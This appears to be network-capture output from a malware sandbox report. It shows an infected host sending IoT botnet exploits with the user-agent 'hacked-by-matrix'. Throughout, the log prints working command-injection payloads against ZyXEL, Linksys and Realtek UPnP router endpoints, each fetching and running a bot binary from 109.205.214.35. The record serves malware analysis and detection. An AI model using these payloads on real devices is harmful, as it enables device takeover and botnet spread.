                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:22:34.669828892 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        526192.168.2.1333422213.150.12.11180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:33.693876028 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        527192.168.2.1347792172.103.219.148080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:34.236673117 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        528192.168.2.1359014172.67.137.1388080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:34.509162903 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        529192.168.2.134901682.180.140.3180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:34.607125044 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:35.502882004 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:36.364535093 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:38.093588114 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:38.375438929 CET1286INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Keep-Alive: timeout=5, max=100
                                                        content-type: text/html
                                                        last-modified: Fri, 21 Jan 2022 00:32:37 GMT
                                                        etag: "999-61e9ff25-cd88ea3f64d127dc;gz"
                                                        accept-ranges: bytes
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        content-length: 1159
                                                        date: Thu, 21 Mar 2024 04:22:47 GMT
                                                        server: LiteSpeed
                                                        platform: hostinger
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8d 73 63 71 10 b6 bb af be e1 60 49 5a 9a 65 2c 8d 68 63 8c fb 1d 67 fd b8 bf 4d 5a 68 ee 5d ca 12 d8 b2
                                                        Data Ascii: Vm6_l5utFbldK^ ;ob|HQE*go|<]d"Xfy*59>J3^PRpvwUKy,qfMZ#1rvr.O['Yl'NTXcC-2H[Wureg'<0G#>v1E^/cyZ.t%#<<0QuOk,D61bQg5i.tX(W0'!yHzHne=6"cm`;I@SIQ3m4GT7z~g2A&Ut59"D^De8dxh<vF>'^%oL:<&+PZj$0i'1#M@%Nbu+}Ed8NwoANXjF\(cStW(k,,[GftBncRX@YTE*Dxot_#t7:IhV;?MO&}o~F{~CMj]5O,>2dY?0(~eaP"LL{.fd!C]l21]izA=w6/;{YoH^77Yj\~[*F?h\q0@Ra<S3o7jz}q`Rpk-RgEQN0Sscq`IZe,hcgMZh]
                                                        Mar 21, 2024 05:22:38.375452042 CET260INData Raw: d3 26 6e 3f fb e2 fa 71 bf 84 fe 70 b2 6f 07 25 0c fa dd ae fa 31 eb 7f 7a 95 9c 3c 7b fa fc e9 cb 17 2f 93 27 cf 82 04 16 de 04 83 43 bc 43 2d 83 2e 14 48 28 e0 9d c3 9c 6f 53 99 f3 ee 36 e9 e5 33 23 d7 db 44 4b ba 66 42 81 73 45 d4 1e fb 88 91
                                                        Data Ascii: &n?qpo%1z<{/'CC-.H(oS63#DKfBsE~NoQyU.!jje4.Y{6me4$b%m I[.X]Mao1BK6Nbpk&h,yE.,gP>f_3 XxF-3d44<rI{fMr
                                                        Mar 21, 2024 05:22:38.376192093 CET932INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 681
                                                        date: Thu, 21 Mar 2024 04:22:47 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        530192.168.2.133764279.132.239.438080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:34.865875959 CET430OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:35.038160086 CET1194INHTTP/1.1 307 Temporary Redirect
                                                        Date: Thu, 21 Mar 2024 04:22:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 152
                                                        Connection: close
                                                        Location: https://127.0.0.1:8080/tmUnblock.cgi
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        531192.168.2.13517165.22.38.15252869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:35.339567900 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
